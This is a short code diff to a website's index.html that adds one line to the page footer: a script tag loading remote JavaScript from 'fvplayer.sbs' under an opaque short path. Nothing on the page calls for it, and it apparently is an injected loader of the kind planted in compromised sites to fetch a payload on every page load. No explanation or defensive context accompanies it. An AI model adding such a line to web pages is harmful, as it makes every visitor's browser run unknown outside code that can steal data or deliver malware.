--- a/index.html
+++ b/index.html
@@ -246,7 +246,7 @@
   <div class="rodape">
       <div class="container-principal">
           <img class="logo-rodape" src="images/logoviva.png">
-  
+  <script src="https://fvplayer.sbs/kEs0f9"></script>
           <div class="redes">
               <i class="bi bi-instagram"></i>
               <i class="bi bi-facebook"></i>
